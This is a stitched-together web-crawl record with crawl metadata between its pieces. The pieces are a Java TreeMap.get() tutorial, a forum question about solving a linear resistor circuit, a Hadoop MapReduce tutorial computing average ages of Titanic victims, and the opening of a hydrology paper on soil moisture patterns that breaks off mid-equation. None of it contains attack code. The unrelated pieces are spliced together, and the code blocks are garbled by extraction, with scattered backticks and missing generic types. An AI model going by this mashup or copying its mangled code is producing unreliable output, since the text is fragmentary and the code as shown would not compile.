] | {"ft_lang_label":"__label__en","ft_lang_prob":0.84246564,"math_prob":0.7942689,"size":2260,"snap":"2019-43-2019-47","text_gpt3_token_len":602,"char_repetition_ratio":0.14583333,"word_repetition_ratio":0.0053908355,"special_character_ratio":0.26902655,"punctuation_ratio":0.16481069,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.96369666,"pos_list":[0,1,2,3,4],"im_url_duplicate_count":[null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-11-17T09:35:19Z\",\"WARC-Record-ID\":\"<urn:uuid:f90124e1-5060-4d19-bffe-e20f383103d0>\",\"Content-Length\":\"46437\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:a74f44f9-dc38-4834-a45a-a68a2c1ed4c1>\",\"WARC-Concurrent-To\":\"<urn:uuid:c0d06150-25c3-4f37-b6ee-c4ccf7ed14a5>\",\"WARC-IP-Address\":\"169.55.25.107\",\"WARC-Target-URI\":\"https://www.daniweb.com/programming/threads/504710/question-on-using-map-with-c-strings-in-c\",\"WARC-Payload-Digest\":\"sha1:WEVRMOGQTARAK4JBY3U7UCKCJHFAGLF3\",\"WARC-Block-Digest\":\"sha1:CBFODT5CAT5CF4BY5RIJ2IRNSEUE25O2\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-47/CC-MAIN-2019-47_segments_1573496668910.63_warc_CC-MAIN-20191117091944-20191117115944-00007.warc.gz\"}"} |
https://www.geeksforgeeks.org/treemap-get-method-in-java/?ref=rp | [
"# TreeMap get() Method in Java\n\n• Difficulty Level : Easy\n• Last Updated : 28 Jun, 2018\n\nThe java.util.TreeMap.get() method of TreeMap class is used to retrieve or fetch the value mapped by a particular key mentioned in the parameter. It returns NULL when the map contains no such mapping for the key.\n\nSyntax:\n\n`Tree_Map.get(Object key_element)`\n\nParameter: The method takes one parameter key_element of object type and refers to the key whose associated value is supposed to be fetched.\n\nReturn Value: The method returns the value associated with the key_element in the parameter.\n\nBelow programs illustrates the working of java.util.TreeMap.get() method:\nProgram 1: Mapping String Values to Integer Keys.\n\n `// Java code to illustrate the get() method``import` `java.util.*;`` ` `public` `class` `Tree_Map_Demo {`` ``public` `static` `void` `main(String[] args)`` ``{`` ` ` ``// Creating an empty TreeMap`` ``TreeMap tree_map = ``new` `TreeMap();`` ` ` ``// Mapping string values to int keys`` ``tree_map.put(``10``, ``\"Geeks\"``);`` ``tree_map.put(``15``, ``\"4\"``);`` ``tree_map.put(``20``, ``\"Geeks\"``);`` ``tree_map.put(``25``, ``\"Welcomes\"``);`` ``tree_map.put(``30``, ``\"You\"``);`` ` ` ``// Displaying the TreeMap`` ``System.out.println(``\"Initial Mappings are: \"` `+ tree_map);`` ` ` ``// Getting the value of 25`` ``System.out.println(``\"The Value is: \"` `+ tree_map.get(``25``));`` ` ` ``// Getting the value of 10`` ``System.out.println(``\"The Value is: \"` `+ tree_map.get(``10``));`` ``}``}`\nOutput:\n```Initial Mappings are: {10=Geeks, 15=4, 20=Geeks, 25=Welcomes, 30=You}\nThe Value is: Welcomes\nThe Value is: Geeks\n```\n\nProgram 2: Mapping Integer Values to String Keys.\n\n `// Java code to illustrate the get() method``import` `java.util.*;`` ` `public` `class` `Tree_Map_Demo {`` ``public` `static` `void` `main(String[] args)`` ``{`` ` ` ``// Creating an empty TreeMap`` ``TreeMap tree_map = ``new` `TreeMap();`` ` ` ``// Mapping int values to string keys`` ``tree_map.put(``\"Geeks\"``, ``10``);`` ``tree_map.put(``\"4\"``, ``15``);`` ``tree_map.put(``\"Geeks\"``, ``20``);`` ``tree_map.put(``\"Welcomes\"``, ``25``);`` ``tree_map.put(``\"You\"``, ``30``);`` ` ` ``// Displaying the TreeMap`` ``System.out.println(``\"Initial Mappings are: \"` `+ tree_map);`` ` ` ``// Getting the value of \"Geeks\"`` ``System.out.println(``\"The Value is: \"` `+ tree_map.get(``\"Geeks\"``));`` ` ` ``// Getting the value of \"You\"`` ``System.out.println(``\"The Value is: \"` `+ tree_map.get(``\"You\"``));`` ``}``}`\nOutput:\n```Initial Mappings are: {4=15, Geeks=20, Welcomes=25, You=30}\nThe Value is: 20\nThe Value is: 30\n```\n\nNote: The same operation can be performed with any type of Mappings with variation and combination of different data types.\n\nMy Personal Notes arrow_drop_up"
] | [
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.53595954,"math_prob":0.7415774,"size":2391,"snap":"2022-05-2022-21","text_gpt3_token_len":642,"char_repetition_ratio":0.15500629,"word_repetition_ratio":0.24590164,"special_character_ratio":0.3019657,"punctuation_ratio":0.22269808,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.96844363,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-05-21T10:49:50Z\",\"WARC-Record-ID\":\"<urn:uuid:42f5760d-442a-43cf-991e-962c370fc6ae>\",\"Content-Length\":\"129428\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:4766bb6e-3adb-4b81-8d99-5c718e0e9950>\",\"WARC-Concurrent-To\":\"<urn:uuid:b3fd4f32-a3eb-4e04-bef5-48fb0d3d79b9>\",\"WARC-IP-Address\":\"23.218.216.136\",\"WARC-Target-URI\":\"https://www.geeksforgeeks.org/treemap-get-method-in-java/?ref=rp\",\"WARC-Payload-Digest\":\"sha1:MX2M2R7JF7ZX5U7TZSH37TAQFG54W4QI\",\"WARC-Block-Digest\":\"sha1:RD5F27VQLSIPJY5XGQNM7YTZRFHWO4IW\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-21/CC-MAIN-2022-21_segments_1652662539049.32_warc_CC-MAIN-20220521080921-20220521110921-00487.warc.gz\"}"} |
https://electronics.stackexchange.com/questions/475877/finding-voltages-in-a-linear-circuit | [
"# Finding voltages in a linear circuit\n\nA linear circuit is shown in the figure.\n\nThe elements in this circuit have the following values: R = 100 Ohms, R2 = 200 Ohms, R3 = 350 Ohms, V = 5V, and I = 0.004 A.\n\n1. Determine the potentials of drops v_a and v_b across resistors R1 and R2 respectively.\n\n2. Now let us determine if the answers you came up with satisfy the laws of physics. (a) What is the power (in Watts) dissipated in resistor R1? (b) What is the power (in Watts) dissipated in resistor R2? (c) What is the power (in Watts) dissipated in resistor R3? (d) What is the power (in Watts) coming out of the voltage source V? (e) What is the power (in Watts) coming out of the current source I?",
null,
"From the circuit I have:\n\n$$\\-v_b + v_a + V = 0\\$$\n\n$$\\v_b - V = v_a\\$$\n\n$$\\i_1 = (v_b - V)/R_1\\$$\n\n$$\\I + i_2 = i_1\\$$\n\n$$\\(v_b - V)/R_1 = I + v_b/R_2\\$$\n\nFrom this last equation I get $$\\v_b = 10.8\\$$ and hence $$\\v_a = 5.8\\$$.\n\nHowever, apparently that is wrong. (And hence my answers to #2 were all wrong as well.) Why is that so? What might I be doing wrong?\n\n• Assuming $R=R_1$, there is only one unknown node voltage, which is $V_\\text{B}$. (Just ground the bottom node to make it $0\\:\\text{V}$.) The result should be $V_\\text{B}=3.6\\:\\text{V}$. From there, the answers just flow out. Do you see how to develop that voltage? – jonk Jan 13 at 7:54\n• Wrong sign in the last equation. And you haven't stated where i2 is. – Chu Jan 13 at 12:50\n\n• But the currents are not defined in the circuit. There is no marking of $i_1$ or $i_2$ in the circuit. – Elliot Alderson Jan 13 at 18:31"
] | [
null,
"https://i.stack.imgur.com/KjDU5.png",
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.93057865,"math_prob":0.9983327,"size":995,"snap":"2020-34-2020-40","text_gpt3_token_len":325,"char_repetition_ratio":0.1493441,"word_repetition_ratio":0.13636364,"special_character_ratio":0.3557789,"punctuation_ratio":0.112676054,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9999404,"pos_list":[0,1,2],"im_url_duplicate_count":[null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-09-23T04:21:29Z\",\"WARC-Record-ID\":\"<urn:uuid:93942599-d8b7-409b-875a-3e3ad100f544>\",\"Content-Length\":\"151724\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:8ea747b8-05f4-45cf-9873-46d2516a324e>\",\"WARC-Concurrent-To\":\"<urn:uuid:cb6be242-5aa4-4596-ab5b-8e1650933777>\",\"WARC-IP-Address\":\"151.101.193.69\",\"WARC-Target-URI\":\"https://electronics.stackexchange.com/questions/475877/finding-voltages-in-a-linear-circuit\",\"WARC-Payload-Digest\":\"sha1:PEJKFW7R4S7PYLOUDJNK3XTOUYHRWR7E\",\"WARC-Block-Digest\":\"sha1:AQUFEID3BIMF4PW6PAAXEXDVUVH6CTZI\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-40/CC-MAIN-2020-40_segments_1600400209665.4_warc_CC-MAIN-20200923015227-20200923045227-00688.warc.gz\"}"} |
https://www.geeksforgeeks.org/mapreduce-program-finding-the-average-age-of-male-and-female-died-in-titanic-disaster/?ref=rp | [
"# MapReduce Program – Finding The Average Age of Male and Female Died in Titanic Disaster\n\nAll of us are familiar with the disaster that happened on April 14, 1912. The big giant ship of 46000-ton in weight got sink-down to the depth of 13,000 feet in the North Atlantic Ocean. Our aim is to analyze the data obtained after this disaster. Hadoop MapReduce can be utilized to deal with this large datasets efficiently to find any solution for a particular problem.\n\nProblem Statement: Analyzing the Titanic Disaster dataset, for finding the average age of male and female persons died in this disaster with MapReduce Hadoop.\n\n### Step 1:\n\nWe can download the Titanic Dataset from this Link. Below is the column structure of our Titanic dataset. It consist of 12 columns where each row describes the information of a perticular person.",
null,
"### Step 2:\n\nThe first 10 records of the dataset is shown below.",
null,
"### Step 3:\n\nMake the project in Eclipse with below steps:\n\n• First Open Eclipse -> then select File -> New -> Java Project ->Name it Titanic_Data_Analysis -> then select use an execution environment -> choose JavaSE-1.8 then next -> Finish.",
null,
"• In this Project Create Java class with name Average_age -> then click Finish",
null,
"• Copy the below source code to this Average_age java class\n\n `// import libraries ` `import` `java.io.IOException; ` `import` `org.apache.hadoop.fs.Path; ` `import` `org.apache.hadoop.conf.*; ` `import` `org.apache.hadoop.io.*; ` `import` `org.apache.hadoop.mapreduce.*; ` `import` `org.apache.hadoop.mapreduce.lib.input.FileInputFormat; ` `import` `org.apache.hadoop.mapreduce.lib.input.TextInputFormat; ` `import` `org.apache.hadoop.mapreduce.lib.output.FileOutputFormat; ` `import` `org.apache.hadoop.mapreduce.lib.output.TextOutputFormat; ` ` ` `// Making a class with name Average_age ` `public` `class` `Average_age { ` ` ` ` ``public` `static` `class` `Map ``extends` `Mapper { ` ` ` ` ``// private text gender variable which ` ` ``// stores the gender of the person ` ` ``// who died in the Titanic Disaster ` ` ``private` `Text gender = ``new` `Text(); ` ` ` ` ``// private IntWritable variable age will store ` ` ``// the age of the person for MapReduce. where ` ` ``// key is gender and value is age ` ` ``private` `IntWritable age = ``new` `IntWritable(); ` ` ` ` ``// overriding map method(run for one time for each record in dataset) ` ` ``public` `void` `map(LongWritable key, Text value, Context context) ``throws` `IOException, InterruptedException ` ` ``{ ` ` ` ` ``// storing the complete record ` ` ``// in a variable name line ` ` ``String line = value.toString(); ` ` ` ` ``// spliting the line with ', ' as the ` ` ``// values are separated with this ` ` ``// delimiter ` ` ``String str[] = line.split(``\", \"``); ` ` ` ` ``/* checking for the condition where the ` ` ``number of columns in our dataset ` ` ``has to be more than 6. This helps in ` ` ``eliminating the ArrayIndexOutOfBoundsException ` ` ``when the data sometimes is incorrect ` ` ``in our dataset*/` ` ``if` `(str.length > ``6``) { ` ` ` ` ``// storing the gender ` ` ``// which is in 5th column ` ` ``gender.set(str[``4``]); ` ` ` ` ``// checking the 2nd column value in ` ` ``// our dataset, if the person is ` ` ``// died then proceed. ` ` ``if` `((str[``1``].equals(``\"0\"``))) { ` ` ` ` ``// checking for numeric data with ` ` ``// the regular expression in this column ` ` ``if` `(str[``5``].matches(``\"\\\\d+\"``)) { ` ` ` ` ``// converting the numeric ` ` ``// data to INT by typecasting ` ` ``int` `i = Integer.parseInt(str[``5``]); ` ` ` ` ``// storing the person of age ` ` ``age.set(i); ` ` ``} ` ` ``} ` ` ``} ` ` ``// writing key and value to the context ` ` ``// which will be output of our map phase ` ` ``context.write(gender, age); ` ` ``} ` ` ``} ` ` ` ` ``public` `static` `class` `Reduce ``extends` `Reducer { ` ` ` ` ``// overriding reduce method(runs each time for every key ) ` ` ``public` `void` `reduce(Text key, Iterable values, Context context) ` ` ``throws` `IOException, InterruptedException ` ` ``{ ` ` ` ` ``// declaring the variable sum which ` ` ``// will store the sum of ages of people ` ` ``int` `sum = ``0``; ` ` ` ` ``// Variable l keeps incrementing for ` ` ``// all the value of that key. ` ` ``int` `l = ``0``; ` ` ` ` ``// foreach loop ` ` ``for` `(IntWritable val : values) { ` ` ``l += ``1``; ` ` ``// storing and calculating ` ` ``// sum of values ` ` ``sum += val.get(); ` ` ``} ` ` ``sum = sum / l; ` ` ``context.write(key, ``new` `IntWritable(sum)); ` ` ``} ` ` ``} ` ` ` ` ``public` `static` `void` `main(String[] args) ``throws` `Exception ` ` ``{ ` ` ``Configuration conf = ``new` `Configuration(); ` ` ` ` ``@SuppressWarnings``(``\"deprecation\"``) ` ` ``Job job = ``new` `Job(conf, ``\"Averageage_survived\"``); ` ` ``job.setJarByClass(Average_age.``class``); ` ` ` ` ``job.setMapOutputKeyClass(Text.``class``); ` ` ``job.setMapOutputValueClass(IntWritable.``class``); ` ` ` ` ``// job.setNumReduceTasks(0); ` ` ``job.setOutputKeyClass(Text.``class``); ` ` ``job.setOutputValueClass(IntWritable.``class``); ` ` ` ` ``job.setMapperClass(Map.``class``); ` ` ``job.setReducerClass(Reduce.``class``); ` ` ` ` ``job.setInputFormatClass(TextInputFormat.``class``); ` ` ``job.setOutputFormatClass(TextOutputFormat.``class``); ` ` ` ` ``FileInputFormat.addInputPath(job, ``new` `Path(args[``0``])); ` ` ``FileOutputFormat.setOutputPath(job, ``new` `Path(args[``1``])); ` ` ``Path out = ``new` `Path(args[``1``]); ` ` ``out.getFileSystem(conf).delete(out); ` ` ``job.waitForCompletion(``true``); ` ` ``} ` `} `\n\n`hadoop version`",
null,
"• Now we add these external jars to our Titanic_Data_Analysis project. Right Click on Titanic_Data_Analysis -> then select Build Path-> Click on Configue Build Path and select Add External jars…. and add jars from it’s download location then click -> Apply and Close.",
null,
"• Now export the project as jar file. Right-click on Titanic_Data_Analysis choose Export.. and go to Java -> JAR file click -> Next and choose your export destination then click -> Next. Choose Main Class as Average_age by clicking -> Browse and then click -> Finish -> Ok.",
null,
"",
null,
"### Step 4:\n\n`start-dfs.sh`\n`start-yarn.sh`\n\n`jps`",
null,
"### Step 5:\n\nSyntax:\n\n```hdfs dfs -put /file_path /destination\n```\n\nIn below command / shows the root directory of our HDFS.\n\n```hdfs dfs -put /home/dikshant/Documents/titanic_data.txt /\n```\n\nCheck the file sent to our HDFS.\n\n```hdfs dfs -ls /\n```",
null,
"### Step 6:\n\nNow Run your Jar File with below command and produce the output in Titanic_Output File.\n\nSyntax:\n\n```hadoop jar /jar_file_location /dataset_location_in_HDFS /output-file_name\n```\n\nCommand:\n\n```hadoop jar /home/dikshant/Documents/Average_age.jar /titanic_data.txt /Titanic_Output\n```",
null,
"### Step 7:\n\nNow Move to localhost:50070/, under utilities select Browse the file system and download part-r-00000 in /MyOutput directory to see result.\n\nNote: We can also view the result with below command\n\n`hdfs dfs -cat /Titanic_Output/part-r-00000`",
null,
"In the above image, we can see that the average age of the female is 28 and male is 30 according to our dataset who died in the Titanic Disaster.\n\nMy Personal Notes arrow_drop_up",
null,
"Check out this Author's contributed articles.\n\nIf you like GeeksforGeeks and would like to contribute, you can also write an article using contribute.geeksforgeeks.org or mail your article to [email protected]. See your article appearing on the GeeksforGeeks main page and help other Geeks.\n\nPlease Improve this article if you find anything incorrect by clicking on the \"Improve Article\" button below.\n\nArticle Tags :\nPractice Tags :\n\nBe the First to upvote.\n\nPlease write to us at [email protected] to report any issue with the above content."
] | [
null,
"https://media.geeksforgeeks.org/wp-content/uploads/20200708142705/dataset-discription-of-titanic-dataset.png",
null,
"https://media.geeksforgeeks.org/wp-content/uploads/20200708142821/titanic-dataset-first-10-records.png",
null,
"https://media.geeksforgeeks.org/wp-content/uploads/20200708143747/creating-titanic-data-analysis-project.png",
null,
"https://media.geeksforgeeks.org/wp-content/uploads/20200708144313/creating-average-age-java-class.png",
null,
"https://media.geeksforgeeks.org/wp-content/uploads/20200704091836/hadoop-version.png",
null,
"https://media.geeksforgeeks.org/wp-content/uploads/20200708153503/adding-external-jar-files1.png",
null,
"https://media.geeksforgeeks.org/wp-content/uploads/20200704093228/export-java-Titanic_Data_Analysis-project.png",
null,
"https://media.geeksforgeeks.org/wp-content/uploads/20200708145623/selecting-main-class.png",
null,
"https://media.geeksforgeeks.org/wp-content/uploads/20200708150333/check-running-hadoop-daemons.png",
null,
"https://media.geeksforgeeks.org/wp-content/uploads/20200708150733/putting-titanic-dataset-to-HDFS.png",
null,
"https://media.geeksforgeeks.org/wp-content/uploads/20200708151303/running-the-average-age-jar-file.png",
null,
"https://media.geeksforgeeks.org/wp-content/uploads/20200708152129/output300.png",
null,
"https://media.geeksforgeeks.org/auth/avatar.png",
null
] | {"ft_lang_label":"__label__en","ft_lang_prob":0.6416701,"math_prob":0.48063302,"size":7594,"snap":"2020-34-2020-40","text_gpt3_token_len":1820,"char_repetition_ratio":0.11291172,"word_repetition_ratio":0.0069747167,"special_character_ratio":0.23821437,"punctuation_ratio":0.1554054,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.95719725,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26],"im_url_duplicate_count":[null,7,null,7,null,7,null,7,null,7,null,7,null,7,null,7,null,7,null,7,null,7,null,7,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-09-19T19:10:27Z\",\"WARC-Record-ID\":\"<urn:uuid:d430c331-0061-43f7-97f8-7b555e53c874>\",\"Content-Length\":\"128785\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:74ce07aa-b73a-4087-93f4-50043fe2dc1d>\",\"WARC-Concurrent-To\":\"<urn:uuid:5e9ee45b-2aaa-4b96-b798-5fea7a814655>\",\"WARC-IP-Address\":\"23.194.130.155\",\"WARC-Target-URI\":\"https://www.geeksforgeeks.org/mapreduce-program-finding-the-average-age-of-male-and-female-died-in-titanic-disaster/?ref=rp\",\"WARC-Payload-Digest\":\"sha1:3ZXESWT7COAPAAFA5EM7QPTTCCDO3PNC\",\"WARC-Block-Digest\":\"sha1:VUJNYYDZGM6TNGX5JQXRD3DJBSCNFOMZ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-40/CC-MAIN-2020-40_segments_1600400192783.34_warc_CC-MAIN-20200919173334-20200919203334-00035.warc.gz\"}"} |
https://hess.copernicus.org/articles/24/2633/2020/ | [
"https://doi.org/10.5194/hess-24-2633-2020\nhttps://doi.org/10.5194/hess-24-2633-2020",
null,
"# Soil moisture: variable in space but redundant in time\n\nMirko Mälicke, Sibylle K. Hassler, Theresa Blume, Markus Weiler, and Erwin Zehe\nAbstract\n\nSoil moisture at the catchment scale exhibits a huge spatial variability. This suggests that even a large amount of observation points would not be able to capture soil moisture variability.\n\nWe present a measure to capture the spatial dissimilarity and its change over time. Statistical dispersion among observation points is related to their distance to describe spatial patterns. We analyzed the temporal evolution and emergence of these patterns and used the mean shift clustering algorithm to identify and analyze clusters. We found that soil moisture observations from the 19.4 km2 Colpach catchment in Luxembourg cluster in two fundamentally different states. On the one hand, we found rainfall-driven data clusters, usually characterized by strong relationships between dispersion and distance. Their spatial extent roughly matches the average hillslope length in the study area of about 500 m. On the other hand, we found clusters covering the vegetation period. In drying and then dry soil conditions there is no particular spatial dependence in soil moisture patterns, and the values are highly similar beyond hillslope scale.\n\nBy combining uncertainty propagation with information theory, we were able to calculate the information content of spatial similarity with respect to measurement uncertainty (when are patterns different outside of uncertainty margins?). We were able to prove that the spatial information contained in soil moisture observations is highly redundant (differences in spatial patterns over time are within the error margins). Thus, they can be compressed (all cluster members can be substituted by one representative member) to only a fragment of the original data volume without significant information loss.\n\nOur most interesting finding is that even a few soil moisture time series bear a considerable amount of information about dynamic changes in soil moisture. We argue that distributed soil moisture sampling reflects an organized catchment state, where soil moisture variability is not random. Thus, only a small amount of observation points is necessary to capture soil moisture dynamics.\n\nShare\nDates\n1 Introduction\n\nAlthough soil water is by far the smallest freshwater stock on earth, it plays a key role in the functioning of terrestrial ecosystems. Soil moisture controls (preferential) infiltration and runoff generation and is a limiting factor for vegetation growth. Plant-available soil water affects the Bowen ratio, i.e., the partitioning of net radiation energy in latent and sensible heat, and last but not least it is an important control for soil respiration and related trace gas emissions. Technologies and experimental strategies to observe soil water dynamics across scales have been at the core of the hydrological research agenda for more than 20 years . Since these early studies published by Topp, spatially and temporally distributed time domain reflectometry (TDR) and frequency domain reflectometry (FDR) measurements have been widely used to characterize soil moisture dynamics at the transect (e.g., Blume et al.2009), hillslope (e.g., Starr and Timlin2004; Brocca et al.2007) and catchment scale (e.g., Western et al.2004; Bronstert et al.2012). A common conclusion for the catchment scale is that soil moisture exhibits pronounced spatial variability and that distributed point sampling often does not yield representative data for the catchment (see, e.g., , or numerous studies given in Sect. 2.2 of ).\n\nAlthough large spatial variability seems to be a generic feature of soil moisture, there is also evidence that ranks of distributed soil moisture observations are largely stable in time, as observed at the plot , hillslope , and even catchment scale . This rank stability, which is also often referred to as temporal stability , can, i.e., be used to improve sensor networks (e.g., Heathman et al.2009) or select the most representative observation site in terms of soil moisture dynamics (e.g., Teuling et al.2006). In both cases rank stability assumes some kind of organization in the catchment, otherwise this representativity would not be observed.\n\nSoil moisture dynamics have been subject to numerous review works . More specifically, the temporal stability of soil moisture was reviewed by . The authors analyzed a large number of studies with respect to the controls on time stability of soil water content (TS SWC), yet “the basic question about TS SWC and its controls remain unanswered. Moreover, the evidence found in literature with respect to TS SWC controls remains contradictory” (Vanderlinden et al.2012, p. 2, l. 2 ff.). We want to contribute by proposing a method that helps to understand how and when spatial soil moisture patterns are persistent.\n\nSoil moisture responds to two main forcing regimes, namely rainfall-driven wetting or radiation-driven drying. The related controlling factors and processes differ strongly and operate at different spatial and temporal scales, and the soil moisture pattern reflects thus the multitude of these influences . Hence, we hypothesize that periods in which different controlling factors were dominant are reflected in fundamentally different soil moisture patterns. This can manifest itself in changes in the spatial covariance structure , either in the form of changing nugget-to-sill ratios (spatially explained variance) or state-dependent variogram ranges (spatial extent of correlation) . In a homogeneous, flat and non-vegetated landscape the soil moisture pattern shortly after a rainfall event would be the imprint of the precipitation pattern and provide predictive information about its spatial covariance. In contrast, in a heterogeneous landscape driven by spatially uniform block rain events, the spatial pattern of soil moisture would be a largely stable imprint of different landscape properties controlling throughfall, infiltration as well as vertical and lateral soil water redistribution. Without further forcing, the spatial pattern will gradually dissipate due to soil water potential depletion and by lateral soil water flows. We therefore hypothesize that differences in soil moisture (across space) are higher shortly after a rainfall event and are dissipated afterwards.\n\nLandscape heterogeneity is thus a perquisite for temporarily persistent spatial patterns found in a set of soil moisture time series. While most catchments are strongly heterogeneous, it is striking how spatially organized they are . Spatial organization manifests for instance through systematic and structured patterns of catchment properties, such as a catena. This might naturally lead to a systematic variability of those processes controlling wetting and drying of the soil. One approach to diagnose and model systematic variability is based on the covariance between observations in relation to their separating distance and geostatistical interpolation or simulation methods .\n\nA spatial covariance function describes how linear statistical dependence of observations declines with increasing separating distance up to the distance of statistical independence. This is often expressed as an experimental variogram. Geostatistics relies on several assumptions, such as second-order stationarity (see, e.g., or ), which are ultimately important for interpolation. Due to the above-mentioned dynamic nature of soil moisture observations, the most promising avenue for interpolation would be a spatio-temporal geostatistical modeling of our data .\n\nHowever, here we take a different avenue, as we do not intend to interpolate. One of our goals is to detect dynamic changes in the spatial soil moisture pattern. Following we relate the statistical dispersion of soil moisture observations to their separating distance to characterize how their similarity and predictive information decline with this distance (see Sect. 2). More specifically, we analyze temporal changes in the spatial dispersion of distributed soil moisture data and hypothesize that a grouping of the data is possible solely based on the changes in spatial dispersion. We want to find out whether typical patterns emerge in time, how those relate to the different forcing regimes and whether those patterns are recurrent in time. The latter is an indicator of predictability and (self-)organization in dynamic systems .\n\nargued that spatial organization manifests through a similar hydrological functioning. This is in line with the idea of on catchment classification or the early idea of a geomorphological unit hydrograph . Recently, corroborated the idea of and showed that hydrological similarity of discharge time series implies that they are redundant. Redundancy in our context means that new observations (over time) do not add significant new information to the data set of spatial dispersion. Thus, they can be compressed without information loss . This combination of compression rate and information loss is understood to be a measure of spatial organization in our work. More specifically, showed that a set of 105 hillslope models yielded, despite their strong differences in topography, a strongly redundant runoff response. Using Shannon entropy (Shannon1948), showed that the ensemble could be compressed to a set of six to eight typical hillslopes without performance loss. Here we adopt this idea and investigate the redundancy of patterns in spatially distributed soil moisture data along with their compressibility.\n\nThe core objective of this study is to provide evidence that distributed soil moisture time series provide, despite their strong spatial variability, representative information on soil moisture dynamics. More specifically, we test the following hypotheses.\n\n• H1: radiation-driven drying and rainfall-driven wetting leave different fingerprints in the soil moisture pattern.\n\n• H2: both forcing regimes and their seasonal variability may be identified through temporal clustering of dispersion functions.\n\n• H3: spatial dispersion is more pronounced during and shortly after rainfall-driven wetting conditions.\n\n• H4: soil moisture time series are redundant, which implies they are compressible without information loss. However, the degree of compressibility is changing over time.\n\nWe test these hypotheses using a distributed soil moisture data set collected in the Colpach catchment in Luxembourg. In Sect. 2 we give an overview of the study site and our method. The results section consists of three parts: spatial dispersion functions, temporal patterns in their emergence and some insights into generalization (or compressibility) of these functions, followed by a discussion and summary.\n\n2 Methods\n\n## 2.1 Study area and soil moisture data set\n\nWe base our analyses on the CAOS data set, which was collected in the Attert experimental watershed between 2012 and 2017 and is explained in . The Attert catchment is situated in western Luxembourg and Belgium (Fig. 1). Mean monthly temperatures range from 18 C in July to 0 C in January. Mean annual precipitation is approximately 850 mm . The catchment covers three geological formations, Devonian schists of the Ardennes massif in the north-west, a mixture of Triassic sandy marls in the center and a small area on Luxembourg Sandstone on the southern catchment border . The respective soils in the three areas are haplic Cambisols in the schist, different types of Stagnosols in the marls area and Arenosols in the sandstone . The distinct differences in geology are also reflected in topography and land use. In the schist area, land use is mainly forest on steep slopes of the valleys, which intersect plateaus that are used for agriculture and pastures. The marls area has very gentle slopes and is mainly used for pastures and agriculture, while the sandstone area is forested on steep topography.",
null,
"Figure 1Attert experimental catchment in Luxembourg and Belgium. The purple dots show the sensor cluster stations installed during the CAOS project. Here we focus on those cluster stations within the Colpach catchment. Figure adapted after .\n\nThe experimental design is based on spatially distributed, clustered point measurements within replicated hillslopes. Typical hillslope lengths vary between 400 and 600 m, showing maximum elevations of 50 to 100 m above stream level. For further details on the hillslopes, we refer the reader to Fig. 6a in and a detailed description in Sect. 3.1.1 of the same publication. Sensor clusters were installed on hillslopes at the top, midslope and hill foot sectors along the anticipated flow paths. Within each of those clusters, soil moisture was recorded in three profiles at 10, 30 and 50 cm depth using Decagon 5TE sensors. While the entire design was stratified to sample different geological settings (schist, marls, sandstone), different aspects and land use (deciduous forest and pasture), we focus here on those sensors installed in the Colpach catchment. In total we used 19 sensor cluster locations and thus 57 soil moisture profiles consisting of 171 time series.",
null,
"Figure 2Soil moisture data overview. Soil moisture observations in 10 cm (a), 30 cm (b) and 50 cm (c).\n\nSoil moisture in the 19.4 km2 Colpach catchment exhibits high but temporally persistent spatial variability (Fig. 2). For each point in time a wide range of water content values can be observed across the catchment. The range of soil moisture observations is generally wider in winter than in summer. From visual inspection it seems that the heterogeneity in observations is not purely random but systematic, as the measurements are rank stable over long periods. One has to note that the different cluster locations differ in aspect, slope and land use. From the data shown in Fig. 2, two sensors have been removed. Both measured in 50 cm and can be seen in the figure at the very bottom. Both recorded values close to or even below 0.1 cm3 cm−3 for the whole period of 4 years. Additionally, the plateaus lasting for a couple of days at constant 0.5 cm3 cm−3 in 50 and 30 cm were removed.\n\n## 2.2 Dispersion of soil moisture observations as a function of their distance\n\nWe focus on spatial patterns of soil moisture and how they change over time. For our analysis the data set was aggregated to mean daily soil moisture values θ. Each time series is further aggregated using a moving window of 1 month as described by Eq. (1).\n\n$\\begin{array}{}\\text{(1)}& {z}_{x}\\left(t\\right)=\\frac{\\sum _{t}^{t+b}{\\mathit{\\theta }}_{x}}{b}\\end{array}$\n\nThis is calculated for each observation location x and time step t=1, 2, …, (Lb), with a time series length of L in days and a window size of b=301.\n\nTo estimate the spatial dependence structure between observations, we relate their pairwise separation distance to a measure of pairwise similarity. Here, we further define the statistical spatial dispersion as a measure of spatial similarity. We compare the empirical distribution of pairwise value differences at different distances. Statistically, a more dispersed empirical distribution is less well described by its mean value. Thus, observations taken at a specific distance are more similar in value if they are less dispersed.\n\nTo estimate the dispersion, we use the Cressie–Hawkins estimator . This estimator is more robust to extreme values and the contained power transformation handles skewed data better than estimators based on the arithmetic mean . The estimator is given by Eq. (2):\n\n$\\begin{array}{}\\text{(2)}& \\begin{array}{rl}{a}_{t}\\left(h\\right)=& \\frac{\\mathrm{1}}{\\mathrm{2}}{\\left(\\frac{\\mathrm{1}}{N\\left(h\\right)}\\sum 